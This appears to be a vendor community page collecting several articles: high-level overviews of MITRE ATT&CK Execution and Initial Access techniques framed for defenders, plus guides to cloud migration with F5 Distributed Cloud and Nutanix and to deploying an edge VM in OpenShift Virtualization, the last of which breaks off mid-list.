Distributed Cloud
19 TopicsOverview of MITRE ATT&CK Execution Tactic (TA0002)
Introduction to Execution Tactic (TA0002): Execution refers to the methods adversaries use to run malicious code on a target system. This tactic includes a range of techniques designed to execute payloads after gaining access to the network. It is a key stage in the attack lifecycle, as it allows attackers to activate their malicious actions, such as deploying malware, running scripts, or exploiting system vulnerabilities. Successful execution can lead to deeper system control, enabling attackers to perform actions like data theft, system manipulation, or establishing persistence for future exploitation. Now, let’s dive into the various techniques under the Execution tactic and explore how attackers use them. 1. T1651: Cloud Administration Command: Cloud management services can be exploited to execute commands within virtual machines. If an attacker gains administrative access to a cloud environment, they may misuse these services to run commands on the virtual machines. Furthermore, if an adversary compromises a service provider or a delegated administrator account, they could also exploit trusted relationships to execute commands on connected virtual machines. 2. T1059: Command and Scripting Interpreter The misuse of command and script interpreters allows adversaries to execute commands, scripts, or binaries. These interfaces, such as Unix shells on macOS and Linux, Windows Command Shell, and PowerShell are common across platforms and provide direct interaction with systems. Cross-platform interpreters like Python, as well as those tied to client applications (e.g., JavaScript, Visual Basic), can also be misused. Attackers may embed commands and scripts in initial access payloads or download them later via an established C2 (Command and Control) channel. Commands may also be executed via interactive shells or through remote services to enable remote execution. (.001) PowerShell: As PowerShell is already part of Windows, attackers often exploit it to execute commands discreetly without triggering alarms. It’s often used for things like finding information, moving across networks, and running malware directly in memory. This helps avoid detection because nothing is written to disk. Attackers can also execute PowerShell scripts without launching the powershell.exe program by leveraging.NET interfaces. Tools like Empire, PowerSploit, and PoshC2 make it even easier for attackers to use PowerShell for malicious purposes. Example - Remote Command Execution (.002) AppleScript: AppleScript is an macOS scripting language designed to control applications and system components through inter-application messages called AppleEvents. These AppleEvent messages can be sent by themselves or with AppleScript. They can find open windows, send keystrokes, and interact with almost any open application, either locally or remotely. AppleScript can be executed in various ways, including through the command-line interface (CLI) and built-in applications. However, it can also be abused to trigger actions that exploit both the system and the network. (.003) Windows Command Shell: The Windows Command Prompt (CMD) is a lightweight, simple shell on Windows systems, allowing control over most system aspects with varying permission levels. However, it lacks the advanced capabilities of PowerShell. CMD can be used from a distance using Remote Services. Attackers may use it to execute commands or payloads, often sending input and output through a command-and-control channel. Example - Remote Command Execution (.004) Unix Shell: Unix shells serve as the primary command-line interface on Unix-based systems. They provide control over nearly all system functions, with certain commands requiring elevated privileges. Unix shells can be used to run different commands or payloads. They can also run shell scripts to combine multiple commands as part of an attack. Example - Remote Command Execution (.005) Visual Basic: Visual Basic (VB) is a programming language developed by Microsoft, now considered a legacy technology. Visual Basic for Applications (VBA) and VBScript are derivatives of VB. Malicious actors may exploit VB payloads to execute harmful commands, with common attacks, including automating actions via VBScript or embedding VBA content (like macros) in spear-phishing attachments. (.006) Python: Attackers often use popular scripting languages, like Python, due to their interoperability, cross-platform support, and ease of use. Python can be run interactively from the command line or through scripts that can be distributed across systems. It can also be compiled into binary executables. With many built-in libraries for system interaction, such as file operations and device I/O, attackers can leverage Python to download and execute commands, scripts, and perform various malicious actions. Example - Code Injection (.007) JavaScript: JavaScript (JS) is a platform-independent scripting language, commonly used in web pages and runtime environments. Microsoft's JScript and JavaScript for Automation (JXA) on macOS are based on JS. Adversaries exploit JS to execute malicious scripts, often through Drive-by Compromise or by downloading scripts as secondary payloads. Since JS is text-based, it is often obfuscated to evade detection. Example - XSS (.008) Network Device CLI: Network devices often provide a CLI or scripting interpreter accessible via direct console connection or remotely through telnet or SSH. These interfaces allow interaction with the device for various functions. Adversaries may exploit them to alter device behavior, manipulate traffic, load malicious software by modifying configurations, or disable security features and logging to avoid detection. (.009) Cloud API: Cloud APIs offer programmatic access to nearly all aspects of a tenant, available through methods like CLIs, in-browser Cloud Shells, PowerShell modules (e.g., Azure for PowerShell), or SDKs for languages like Python. These APIs provide administrative access to major services. Malicious actors with valid credentials, often stolen, can exploit these APIs to perform malicious actions. (.010) AutoHotKey & AutoIT: AutoIT and AutoHotkey (AHK) are scripting languages used to automate Windows tasks, such as clicking buttons, entering text, and managing programs. Attackers may exploit AHK (.ahk) and AutoIT (.au3) scripts to execute malicious code, like payloads or keyloggers. These scripts can also be embedded in phishing payloads or compiled into standalone executable files (.011) Lua: Lua is a cross-platform scripting and programming language, primarily designed for embedding in applications. It can be executed via the command-line using the standalone Lua interpreter, through scripts (.lua), or within Lua-embedded programs. Adversaries may exploit Lua scripts for malicious purposes, such as abusing or replacing existing Lua interpreters to execute harmful commands at runtime. Malware examples developed using Lua include EvilBunny, Line Runner, PoetRAT, and Remsec. (.012) Hypervisor CLI: Hypervisor CLIs offer extensive functionality for managing both the hypervisor and its hosted virtual machines. On ESXi systems, tools like “esxcli” and “vim-cmd” allow administrators to configure and perform various actions. Attackers may exploit these tools to enable actions like File and Directory Discovery or Data Encrypted for Impact. Malware such as Cheerscrypt and Royal ransomware have leveraged this technique. 3. T1609: Container Administration Command Adversaries may exploit container administration services, like the Docker daemon, Kubernetes API server, or kubelet, to execute commands within containers. In Docker, attackers can specify an entry point to run a script or use docker exec to execute commands in a running container. In Kubernetes, with sufficient permissions, adversaries can gain remote execution by interacting with the API server, kubelet, or using commands like kubectl exec within the cluster. 4. T1610: Deploy Container Containers can be exploited by attackers to run malicious code or bypass security measures, often through the use of harmful processes or weak settings, such as missing network rules or user restrictions. In Kubernetes environments, attackers may deploy containers with elevated privileges or vulnerabilities to access other containers or the host node. They may also use compromised or seemingly benign images that later download malicious payloads. 5. T1675: ESXi Administration Command ESXi administration services can be exploited to execute commands on guest machines within an ESXi virtual environment. ESXi-hosted VMs can be remotely managed via persistent background services, such as the VMware Tools Daemon Service. Adversaries can perform malicious activities on VMs by executing commands through SDKs and APIs, enabling follow-on behaviors like File and Directory Discovery, Data from Local System, or OS Credential Dumping. 6. T1203: Exploitation for Client Execution Adversaries may exploit software vulnerabilities in client applications to execute malicious code. These exploits can target browsers, office applications, or common third-party software. By exploiting specific vulnerabilities, attackers can achieve arbitrary code execution. The most valuable exploits in an offensive toolkit are often those that enable remote code execution, as they provide a pathway to gain access to the target system. Example: Remote Code Execution 7. T1674: Input Injection Input Injection involves adversaries simulating keystrokes on a victim’s computer to carry out actions on their behalf. This can be achieved through several methods, such as emulating keystrokes to execute commands or scripts, or using malicious USB devices to inject keystrokes that trigger scripts or commands. For example, attackers have employed malicious USB devices to simulate keystrokes that launch PowerShell, enabling the download and execution of malware from attacker-controlled servers. 8. T1559: Inter-Process Communication Inter-Process Communication (IPC) is commonly used by processes to share data, exchange messages, or synchronize execution. It also helps prevent issues like deadlocks. However, IPC mechanisms can be abused by adversaries to execute arbitrary code or commands. The implementation of IPC varies across operating systems. Additionally, command and scripting interpreters may leverage underlying IPC mechanisms, and adversaries might exploit remote services—such as the Distributed Component Object Model (DCOM)—to enable remote IPC-based execution. (.001) Component Object Model (Windows): Component Object Model (COM) is an inter-process communication (IPC) mechanism in the Windows API that allows interaction between software objects. A client object can invoke methods on server objects via COM interfaces. Languages like C, C++, Java, and Visual Basic can be used to exploit COM interfaces for arbitrary code execution. Certain COM objects also support functions such as creating scheduled tasks, enabling fileless execution, and facilitating privilege escalation or persistence. (.002) Dynamic Data Exchange (Windows): Dynamic Data Exchange (DDE) is a client-server protocol used for one-time or continuous inter-process communication (IPC) between applications. Adversaries can exploit DDE in Microsoft Office documents—either directly or via embedded files—to execute commands without using macros. Similarly, DDE formulas in CSV files can trigger unintended operations. This technique may also be leveraged by adversaries on compromised systems where direct access to command or scripting interpreters is restricted. (.003) XPC Services(macOS): macOS uses XPC services for inter-process communication, such as between the XPC Service daemon and privileged helper tools in third-party apps. Applications define the communication protocol used with these services. Adversaries can exploit XPC services to execute malicious code, especially if the app’s XPC handler lacks proper client validation or input sanitization, potentially leading to privilege escalation. 9. T1106: Native API Native APIs provide controlled access to low-level kernel services, including those related to hardware, memory management, and process control. These APIs are used by the operating system during system boot and for routine operations. However, adversaries may abuse native API functions to carry out malicious actions. By using assembly directly or indirectly to invoke system calls, attackers can bypass user-mode security measures such as API hooks. Also, attackers may try to change or stop defensive tools that track API use by removing functions or changing sensor behavior. Many well-known exploit tools and malware families—such as Cobalt Strike, Emotet, Lazarus Group, LockBit 3.0, and Stuxnet—have leveraged Native API techniques to bypass security mechanisms, evade detection, and execute low-level malicious operations. 10. T1053: Scheduled Task/Job This technique involves adversaries abusing task scheduling features to execute malicious code at specific times or intervals. Task schedulers are available across major operating systems—including Windows, Linux, macOS, and containerized environments—and can also be used to schedule tasks on remote systems. Adversaries commonly use scheduled tasks for persistence, privilege escalation, and to run malicious payloads under the guise of trusted system processes. (.002) At: The “At” utility is available on Windows, Linux, and macOS for scheduling tasks to run at specific times. Adversaries can exploit “At” to execute programs at system startup or on a set schedule, helping them maintain persistence. It can also be misused for remote execution during lateral movement or to run processes under the context of a specific user account. In Linux environments, attackers may use “At “to break out of restricted environments, aiding in privilege escalation. (.003) Cron: The “cron” utility is a time-based job scheduler used in Unix-like operating systems. The “crontab” file contains scheduled tasks and the times at which they should run. These files are stored in system-specific file paths. Adversaries can exploit “cron” in Linux or Unix environments to execute programs at startup or on a set schedule, maintaining persistence. In ESXi environments, “cron” jobs must be created directly through the “crontab” file. (.005) Scheduled Task: Adversaries can misuse Windows Task Scheduler to run programs at startup or on a schedule, ensuring persistence. It can also be exploited for remote execution during lateral movement or to run processes under specific accounts (e.g., SYSTEM). Similar to System Binary Proxy Execution, attackers may hide one-time executions under trusted system processes. They can also create "hidden" tasks that are not visible to defender tools or manual queries. Additionally, attackers may alter registry metadata to further conceal these tasks. (.006) Systemd Timers: Systemd timers are files with a .timer extension used to control services in Linux, serving as an alternative to Cron. They can be activated remotely via the systemctl command over SSH. Each .timer file requires a corresponding .service file. Adversaries can exploit systemd timers to run malicious code at startup or on a schedule for persistence. Timers placed in privileged paths can maintain root-level persistence, while user-level timers can provide user-level persistence. (.007) Container Orchestration Job: Container orchestration jobs automate tasks at specific times, similar to cron jobs on Linux. These jobs can be configured to maintain a set number of containers, helping persist within a cluster. In Kubernetes, a CronJob schedules a Job that runs containers to perform tasks. Adversaries can exploit CronJobs to deploy Jobs that execute malicious code across multiple nodes in a cluster. 11. T1648: Serverless Execution Cloud providers offer various serverless resources such as compute functions, integration services, and web-based triggers that adversaries can exploit to execute arbitrary commands, hijack resources, or deploy functions for further compromise. Cloud events can also trigger these serverless functions, potentially enabling persistent and stealthy execution over time. An example of this is Pacu, a well-known open-source AWS exploitation framework, which leverages serverless execution techniques. 12. T1229: Shared Modules Shared modules are executable components loaded into processes to provide access to reusable code, such as custom functions or Native API calls. Adversaries can abuse this mechanism to execute arbitrary payloads by modularizing their malware into shared objects that perform various malicious functions. On Linux and macOS, the module loader can load shared objects from any local path. On Windows, the loader can load DLLs from both local paths and Universal Naming Convention (UNC) network paths. 13. T1072: Software Deployment Tools Adversaries may exploit centralized management tools to execute commands and move laterally across enterprise networks. Access to endpoint or configuration management platforms can enable remote code execution, data collection, or destructive actions like wiping systems. SaaS-based configuration management tools can also extend this control to cloud-hosted instances and on-premises systems. Similarly, configuration tools used in network infrastructure devices may be abused in the same way. The level of access required for such activity depends on the system’s configuration and security posture. 14. T1569: System Services System services and daemons can be abused to execute malicious commands or programs, whether locally or remotely. Creating or modifying services allows execution of payloads for persistence—particularly if set to run at startup—or for temporary, one-time actions. (.001) Launchctl (MacOS): launchctl interacts with launchd, the service management framework for macOS. It supports running subcommands via the command line, interactively, or from standard input. Adversaries can use launchctl to execute commands and programs as Launch Agents or Launch Daemons, either through scripts or manual commands. (.002) Service Execution (Windows): The Windows Service Control Manager (services.exe) manages services and is accessible through both the GUI and system utilities. Tools like PsExec and sc.exe can be used for remote execution by specifying remote servers. Adversaries may exploit these tools to execute malicious content by starting new or modified services. This technique is often used for persistence or privilege escalation. (.003) Systemctl (Linux): systemctl is the main interface for systemd, the Linux init system and service manager. It is typically used from a shell but can also be integrated into scripts or applications. Adversaries may exploit systemctl to execute commands or programs as systemd services. 15. T1204: User Execution Users may be tricked into running malicious code by opening a harmful file or link, often through social engineering. While this usually happens right after initial access, it can occur at other stages of an attack. Adversaries might also deceive users to enable remote access tools, run malicious scripts, or coercing users to manually download and execute malware. Tech support scams often use phishing, vishing, and fake websites, with scammers spoofing numbers or setting up fake call centers to steal access or install malware. (.001) Malicious Link: Users may be tricked into clicking on a link that triggers code execution. This could also involve exploiting a browser or application vulnerability (Exploitation for Client Execution). Additionally, links might lead users to download files that, when executed, deliver malware file. (.002) Malicious File: Users may be tricked into opening a file that leads to code execution. Adversaries often use techniques like masquerading and obfuscating files to make them appear legitimate, increasing the chances that users will open and execute the malicious file. (.003) Malicious Image: Cloud images from platforms like AWS, GCP, and Azure, as well as popular container runtimes like Docker, can be backdoored. These compromised images may be uploaded to public repositories and users might unknowingly download and deploy an instance or container, bypassing Initial Access defenses. Adversaries may also use misleading names to increase the chances of users mistakenly deploying the malicious image. (.004) Malicious Copy and Paste: Users may be deceived into copying and pasting malicious code into a Command or Scripting Interpreter. Malicious websites might display fake error messages or CAPTCHA prompts, instructing users to open a terminal or the Windows Run Dialog and run arbitrary, often obfuscated commands. Once executed, the adversary can gain access to the victim's machine. Phishing emails may also be used to trick users into performing this action. 16. T1047: Windows Management Instrumentation WMI (Windows Management Instrumentation) is a tool designed for programmers, providing a standardized way to manage and access data on Windows systems. It serves as an administrative feature that allows interaction with system components. Adversaries can exploit WMI to interact with both local and remote systems, using it to perform actions such as gathering information for discovery or executing commands and payloads. How F5 can help? F5 security solutions like WAF (Web Application Firewall), API security, and DDoS mitigation protect the applications and APIs across platforms including Clouds, Edge, On-prem or Hybrid, thereby reducing security risks. F5 bot and risk management solutions can also stop bad bots and automation. This can make your modern applications safer. The example attacks mentioned under techniques can be effectively mitigated by F5 products like Distributed Cloud, BIG-IP and NGINX. Here are a few links which explain the mitigation steps. Mitigating Cross-Site Scripting (XSS) using F5 Advanced WAF Mitigating Struts2 RCE using F5 BIG-IP For more details on the other mitigation techniques of MITRE ATT&CK Execution Tactic TA0002, please reach out to your local F5 team. Reference Links: MITRE ATT&CK® Execution, Tactic TA0002 - Enterprise | MITRE ATT&CK® MITRE ATT&CK: What It Is, How it Works, Who Uses It and Why | F5 Labs31Views1like0CommentsIntroducing AI Assistant for F5 Distributed Cloud, F5 NGINX One and BIG-IP
This article is an introduction to AI Assistant and shows how it improves SecOps and NetOps speed across all F5 platforms (Distributed Cloud, NGINX One and BIG-IP) , by solving the complexities around configuration, analytics, log interpretation and scripting.364Views3likes1CommentOverview of MITRE ATT&CK Framework and Initial Access Tactic (TA0001)
Introduction to MITRE ATT&CK: In today’s modern world, cyber threats are becoming more and more sophisticated, causing an urgent need for organizations across the world to understand how adversaries operate, so that they can protect their digital assets from being compromised. MITRE ATT&CK (Adversarial Tactics, Techniques and Common Knowledge) framework acts as a helpful resource for security teams in organizations to identify and analyze the attack patterns, techniques and tactics used to achieve exploitation. It is a globally accepted, continually updated and publicly available framework based on real-world observations of the latest cyber attacks. It keeps track of APT (Advanced Persistent Threat) groups and TTPs (Tactics, Techniques and Procedures) to provide guidance on procedures followed by the adversaries to compromise an organization’s resources. It is widely used in the cybersecurity field to improve security measures for organizations by enhancing their defensive capabilities. Here are some key words to be familiarized with before we dive deeper. APT (Advanced Persistent Threat): These are advanced groups of cyber attackers, heavily backed and funded to perform cyber-attack campaigns for a long period of time without getting detected. TTPs (Tactics, Techniques and Procedures): Tactics: It deals with the objective and goal of attackers Techniques: It deals with how attackers are going to accomplish their objective Sub-Techniques: It provides a more granular detail about the implementation of a specific technique Procedures: It deals with the implementation of techniques or sub-techniques to attain the objective. The current version of Enterprise ATT&CK matrix includes 14 tactics with each tactic containing multiple techniques and sub-techniques. Below are the tactics included in Enterprise matrix with their brief overview: TA0043 Reconnaissance: Gather information about the target. TA0042 Resource Development: Accumulate and prepare resources to carry out attacks. TA0001 Initial Access: Infiltrate into the target’s infra or network or system. TA0002 Execution: Run malicious code on victim’s system. TA0003 Persistence: Maintain access to the compromised system. TA0004 Privilege Escalation: Elevate privileges to access more sensitive information. TA0005 Defense Evasion: Bypass security detections. TA0006 Credential access: Steal credentials. TA0007 Discovery: Learn more about the compromised system’s environment. TA0008 Lateral Movement: Hop to other system’s connected in the same network. TA0009 Collection: Gather sensitive information. TA0011 Command and Control: Establish remote communication with compromised system. TA0010 Exfiltration: Steal data from the compromised system. TA0040 Impact: Destruction or manipulation of data or system, making it unavailable for victim Introduction to Initial Access Tactic (TA0001): As the name explains, Initial access means gaining access to the network. Initial Access tactic provides all the possible techniques used by adversaries to gain access and enter a network. This is a crucial phase in the attack lifecycle as the attacker looks for an entry point to step their foot into the network. Successful initial access can open the door to a wide range of exploitations like privilege escalation, confidential data theft and much more. Let us now quickly go through the techniques that fall under Initial Access and understand them. 1. Content Injection (T1659): Content Injection is a web application vulnerability where an attacker tries to manipulate and inject malicious content into a web page through a vulnerable endpoint within the application. Attackers can inject any type of content like harmful HTML, JavaScript or alter the existing content on the web page, which could lead to harmful consequences. Ideally, this type of attack takes place upon user interactions (click, enter data, submit a form). Example: File inclusion or upload 2. Drive-by Compromise (T1189): Using Drive-by compromise technique, the adversary typically tries to compromise the victim’s browser through a malicious or compromised website. Attackers inject malicious code such as malware, ransomware or exploit kits into the web page, which is then automatically executed when the victim visits the page without their knowledge or interaction. Example: Cross-Site Scripting 3. Exploit Public-Facing Applications (T1190): In this technique, attackers attempt to exploit vulnerabilities in publicly accessible web applications, web servers, or databases to gain access to a network. Vulnerability in the application, security misconfigurations, inadequate access control mechanisms, or the use of outdated or unpatched software are some of the possible reasons for these attacks. Such weaknesses provide attackers the opportunity to gain unauthorized access, escalate privileges, or compromise sensitive data. Example: SQL Injection 4. External Remote Services (T1133): Adversaries target to enter an organization’s network by exploiting weaknesses in external sources like VPNs, Remote Desktop Protocol (RDP), Citrix, Cloud Services, external file sharing and others that allow remote access to the internal systems. Lack of proper authentication mechanisms, access control, VPN misconfiguration and usage of insecure connections lay the path to this type of attack. 5. Hardware Additions (T1200): In this technique, the attacker exploits the target system/network by connecting new hardware, networking devices or other computing devices to gain access. Attackers can use USB keyloggers to capture keystrokes and steal credentials or can use routers/switches/passive network tapping/network traffic modification that can intercept or control networks. As this technique involves physical hardware, it provides persistent access to the attacker even if the software’s defenses are intact. 6. Phishing (T1566): Phishing is a technique in which attackers exploit an individual/organization by sending deceptive emails, texts, files that appear to be from trusted and legitimate sources. Attackers craft and design the content to trick users into clicking malicious links, downloading attachments, or revealing personal sensitive information such as usernames, passwords, or financial details. A more targeted form of phishing is called Spearphishing. (.001) Spearphishing Attachment: This is a type of phishing in which an attacker sends an email or text with malicious files attached to them, such as executable files, PDFs, or Word Documents. When a user opens/downloads an attachment, a malicious payload will be injected into the system. (.002) Spearphishing Link: Here, adversaries send emails or texts with malicious links in it that look legitimate. When a user clicks or copy and pastes the URL into a browser, it can download the malicious content into the system or sometimes, the users are tricked into entering their personal information like credentials, bank details, Unique Identity numbers. (.003) Spearphishing via Service: Here, adversaries use third party online services or platforms like social media services, personal web mail as the source to conduct their phishing attack. (.004) Spearphishing Voice : Here, an attacker compromises a victim with voice communication. The attacker pretends to be a person from trusted organizations such as banks or government officials and tricks the victims into revealing sensitive information over the phone. 7. Replication Through Removable Media (T1091): Replication through removable media is a technique in which adversaries use removable media like USB drives, external hard disks to spread malicious payloads and also to replicate the malware between systems. Sometimes, malicious code can automatically execute when the device is plugged in if the system has autoplay or autorun enabled, or the attacker might rely on user interaction to run the malicious payload. 8. Supply Chain Compromise (T1195): In Supply Chain Compromise, an adversary targets and compromises a company’s supply chain such as suppliers, vendors, or third-party service providers before receipt by the end customer. Attackers can introduce malicious elements into Software updates, hardware or Dependent sources before its delivery. (.001) Compromise Software Dependencies and Development Tools: Here, an adversary tries to manipulate the third-party open-source software system, development tools or service providers that are being used by the organization. (.002) Compromise Software Supply Chain: Attacker manipulates software updates, libraries, or repository used for distributing software before it reaches out to the final customer. This compromised patch will be unknowingly installed by the organization when they update or install software. (.003) Compromise Hardware Supply Chain: Here, an attacker manipulates hardware components or devices before they reach the end-user. Once the device is installed within an organization, it provides a persistent backdoor for attackers. Example: Insecure Deserialization, log4j 9. Trusted Relationship (T1199): In Trusted Relationship technique, adversaries exploit the relationship between the target organization and their partners, vendors, or internal users to gain access. Adversaries focus the trusted entities and leverage them as sources of attack because these entities are typically subjected to less stringent scrutiny and may have elevated permissions to critical systems within the target organization, which adversaries can exploit to carry out their attack. Example: Unsafe Consumption of APIs 10. Valid Accounts (T1078): The Valid Accounts technique is one of the most common methods adversaries use to gain unauthorized access to systems by exploiting legitimate credentials. Attackers attempt to use stolen credentials or guessed passwords to gain access to the systems, leveraging the compromised or weak credentials as this can bypass security mechanisms, gain persistent and privileged access. Example: Brute Force (.001) Default Accounts: Here, adversaries try to exploit credentials of default accounts like Guest or Administrator accounts. Default accounts also include factory/provider set accounts on other types of systems, software, or devices, including the root user account in AWS and the default service account in Kubernetes. Failing to change the credentials provided for default accounts exposes the organization to high security risks. (.002) Domain Accounts: Here, adversaries exploit user or system credentials that are part of a domain. Domain accounts are managed by Active Directory Domain Services, where access and permissions are set across systems and services within the domain. (.003) Local Accounts: Adversaries exploit the credentials of local accounts. Local accounts are typically configured by an organization for use by users, remote support services, or for administrative tasks on individual systems or services. (.004) Cloud Accounts: Adversaries exploit valid credentials of cloud accounts to access cloud-based services and infrastructure. As organizations increasingly rely on cloud environments such as Amazon Web Services (AWS), Microsoft Azure, Google Cloud, and other cloud platforms, adversaries target cloud accounts to exploit resources, steal data, or perform further malicious activities within the cloud environment. How F5 can help? F5 security solutions like WAF (Web Application Firewall), API security, and DDoS mitigation protect the applications and APIs across platforms including Clouds, Edge, On-prem or Hybrid thereby reducing security risks. In addition to the above solutions, F5 bot and risk management solutions effectively mitigate malicious bots and automation, which can enhance the security posture of your modern applications. The example attacks mentioned under techniques can be effectively mitigated by F5 products like Distributed Cloud, BIG-IP and NGINX. Here are a few links which explain the mitigation steps. Mitigating Cross-Site Scripting (XSS) using F5 Advanced WAF Mitigating Injection flaws using F5 Distributed Cloud Mitigating Log4j vulnerability using F5 Distributed Cloud Mitigating SQL injection using F5 NGINX App Protect For more details on the other mitigation techniques of MITRE ATT&CK Initial Access Tactic TA0001, please reach out to your local F5 team. NOTE: This is the first article in MITRE series and stay tuned for more tactics-related articles. Reference Links: MITRE ATT&CK® Initial Access, Tactic TA0001 - Enterprise | MITRE ATT&CK® MITRE ATT&CK: What It Is, How it Works, Who Uses It and Why | F5 Labs157Views1like0CommentsSecure and Seamless Cloud Application Migration with F5 Distributed Cloud and Nutanix
Introduction F5 Distributed Cloud (XC) offers SaaS-based security, networking, and application management services for multicloud environments, on-premises infrastructures, and edge locations. F5 Distributed Cloud Services Customer Edge (CE) enhances these capabilities by integrating into a customer’s environment, enabling centralized management via the F5 Distributed Cloud Console while being fully operated by the customer. F5 Distributed Cloud Services Customer Edge (CE) can be deployed in public clouds, on-premises, or at the edge. Nutanix is a leading provider of Hyperconverged Infrastructure (HCI), which integrates storage, compute, networking, and virtualization into a unified, scalable, and easily managed solution. Nutanix Cloud Clusters (NC2) extend on-premises data centers to public clouds, maintaining the simplicity of the Nutanix software stack with a unified management console. NC2 runs AOS and AHV on public cloud instances, offering the same CLI, user interface, and APIs as on-premises environments. This article explores how F5 Distributed Cloud and Nutanix collaborate to deliver secure and seamless application services across various types of cloud application migrations. Whether migrating applications to the cloud, repatriating them from public clouds, or transitioning into a hybrid multicloud environment, F5 Distributed Cloud and Nutanix ensure optimal performance and security at all times. Illustration F5 Distributed Cloud App Connect securely connect distributed application services across hybrid and multicloud environments. It operates seamlessly with a platform of web application and API protection (WAAP) services, safeguarding apps and APIs against a wide range of threats through robust security policies including an integrated WAF, DDoS protection, bot management, and other security tools. This enables the enforcement of consistent and comprehensive security policies across all applications without the need to configure individual custom policies for each app and environment. Additionally, it provides centralized observability by providing clear insights into performance metrics, security posture, and operational statuses across all cloud platforms. In this section, we illustrate how to utilize F5 Distributed App Connect with Nutanix for different cloud application migration scenarios. Cloud Migration In our example, we have a VMware environment within a data center located in San Jose. Our goal is to migrate the on-premises application nutanix.f5-demo.com from the VMware environment to a multicloud environment by distributing the application workloads across Nutanix Cloud Clusters (NC2) on AWS and Nutanix Cloud Clusters (NC2) on Azure. First, we deploy F5 Distributed Cloud Customer Edge (CE) and application workloads on Nutanix Cloud Clusters (NC2) on AWS as well as Nutanix Cloud Clusters (NC2) on Azure. F5 Distributed Cloud App Connect addresses the issue of IP overlapping, enabling us to deploy application workloads using the same IP addresses as those in the VMware environment in the San Jose data center. Next, we create origin pools on the F5 Distributed Cloud Console. In our example, we create two origin pools: nutanix-nc2-aws-pool for origin servers on NC2 on AWS and nutanix-nc2-azure-pool for origin servers on NC2 on Azure. To ensure minimal application services disruption, we update the HTTP Load Balancer for nutanix.f5-demo.com to include both new origin pools, and we assign them with a higher weight than the existing pool vmware-sj-pool so that the origin servers on Nutanix Cloud Clusters (NC2) on AWS and on Nutanix Cloud Clusters (NC2) on Azure will receive more traffic compared to the origin servers in the VMware environment in the San Jose data center. Note that web application firewall (WAF) nutanix-demo is enabled. Finally, we remove vmware-sj-pool to complete the cloud migration. Cloud Repatriation In this example, xc.f5-demo.com is deployed in a multicloud environment across AWS and Azure. Our objective is to migrate the application back to the Nutanix environment in the San Jose data center from the public clouds. To begin, we deploy F5 Distributed Cloud Customer Edge (CE) and application workloads in Nutanix AHV. We deploy the application workloads using the same IP addresses as those in the public clouds because IP overlapping is not a concern with F5 Distributed Cloud App Connect. On the F5 Distributed Cloud Console, we create an origin pool nutanix-sj-pool with the origin servers originating from the Nutanix environment in the San Jose data center. We then update the HTTP Load Balancer for xc.f5-demo.com to include the new origin pool, and assign it with a higher weight than both existing pools: xc-aws-pool with origin servers on AWS and xc-azure-pool with origin servers on Azure. As a result, the origin servers in the Nutanix environment, located in the San Jose data center will receive more traffic compared to origin servers in other pools. To ensure all applications receive the same level of security protection, web application firewall (WAF) nutanix-demo is also applied here. To complete the cloud repatriation, we remove xc-aws-pool and xc-azure-pool. The application service experiences minimal disruption during and after the migration. Hybrid Multicloud Our goal in this example is to bring xc-nutanix.f5-demo.com into a hybrid multicloud environment, as it is presently deployed solely in the San Jose data center. We first deploy F5 Distributed Cloud Customer Edge (CE) and application workloads on Nutanix Cloud Clusters (NC2) on AWS as well as on Nutanix Cloud Clusters (NC2) on Azure. We create an origin pool with origin servers originating from each of the F5 Distributed Cloud Customer Edge (CE) sites on the F5 Distributed Cloud Console. Next, we update the HTTP Load Balancer for xc-nutanix.f5-demo.com so that it includes all origin pools: nutanix-sj-pool (Nutanix AHV in our San Jose data center), nutanix-nc2-aws-pool (NC2 on AWS), and nutanix-nc2-azure-pool (NC2 on Azure). Note that web application firewall (WAF) nutanix-demo is applied here as well so that we can ensure a consistent level of security protection across all applications no matter where they are deployed. xc-nutanix.f5-demo.com is now in a hybrid multicloud environment. F5 Distributed Cloud Console is the centralized console for configuration management and observability. It provides real-time metrics and analytics, which allows us proactively monitor security events. Additionally, its integrated AI assistant delivers real-time insights and actionable recommendations of security events, enhancing our understanding of the security events and enabling more informed decision-making. This enables us to swiftly detect and respond to emerging threats, thereby sustaining a robust security posture. Conclusion Cloud application migration can be complex and challenging. F5 Distributed Cloud and Nutanix collaborate to offer a secure and streamlined solution that minimizes risk and disruption during and after the migration process, including those migrating from VMware environments. This ensures a seamless cloud application transition while maintaining business continuity throughout the entire process and beyond.250Views1like0CommentsDeploying F5 Distributed Cloud Customer Edge in Red Hat OpenShift Virtualization
Introduction Red Hat OpenShift Virtualization is a feature that brings virtual machine (VM) workloads into the Kubernetes platform, allowing them to run alongside containerized applications in a seamless, unified environment. Built on the open-source KubeVirt project, OpenShift Virtualization enables organizations to manage VMs using the same tools and workflows they use for containers. Why OpenShift Virtualization? Organizations today face critical needs such as: Rapid Migration: "I want to migrate ASAP" from traditional virtualization platforms to more modern solutions. Infrastructure Modernization: Transitioning legacy VM environments to leverage the benefits of hybrid and cloud-native architectures. Unified Management: Running VMs alongside containerized applications to simplify operations and enhance resource utilization. OpenShift Virtualization addresses these challenges by consolidating legacy and cloud-native workloads onto a single platform. This consolidation simplifies management, enhances operational efficiency, and facilitates infrastructure modernization without disrupting existing services. Integrating F5 Distributed Cloud Customer Edge (XC CE) into OpenShift Virtualization further enhances this environment by providing advanced networking and security capabilities. This combination offers several benefits: Multi-Tenancy: Deploy multiple CE VMs, each dedicated to a specific tenant, enabling isolation and customization for different teams or departments within a secure, multi-tenant environment. Load Balancing: Efficiently manage and distribute application traffic to optimize performance and resource utilization. Enhanced Security: Implement advanced threat protection at the edge to strengthen your security posture against emerging threats. Microservices Management: Seamlessly integrate and manage microservices, enhancing agility and scalability. This guide provides a step-by-step approach to deploying XC CE within OpenShift Virtualization, detailing the technical considerations and configurations required. Technical Overview Deploying XC CE within OpenShift Virtualization involves several key technical steps: Preparation Cluster Setup: Ensure an operational OpenShift cluster with OpenShift Virtualization installed. Access Rights: Confirm administrative permissions to configure compute and network settings. F5 XC Account: Obtain access to generate node tokens and download the XC CE images. Resource Optimization: Enable CPU Manager: Configure the CPU Manager to allocate CPU resources effectively. Configure Topology Manager: Set the policy to single-numa-node for optimal NUMA performance. Network Configuration: Open vSwitch (OVS) Bridges: Set up OVS bridges on worker nodes to handle networking for the virtual machines. NetworkAttachmentDefinitions (NADs): Use Multus CNI to define how virtual machines attach to multiple networks, supporting both external and internal connectivity. Image Preparation: Obtain XC CE Image: Download the XC CE image in qcow2 format suitable for KubeVirt. Generate Node Token: Create a one-time node token from the F5 Distributed Cloud Console for node registration. User Data Configuration: Prepare cloud-init user data with the node token and network settings to automate the VM initialization process. Deployment: Create DataVolumes: Import the XC CE image into the cluster using the Containerized Data Importer (CDI). Deploy 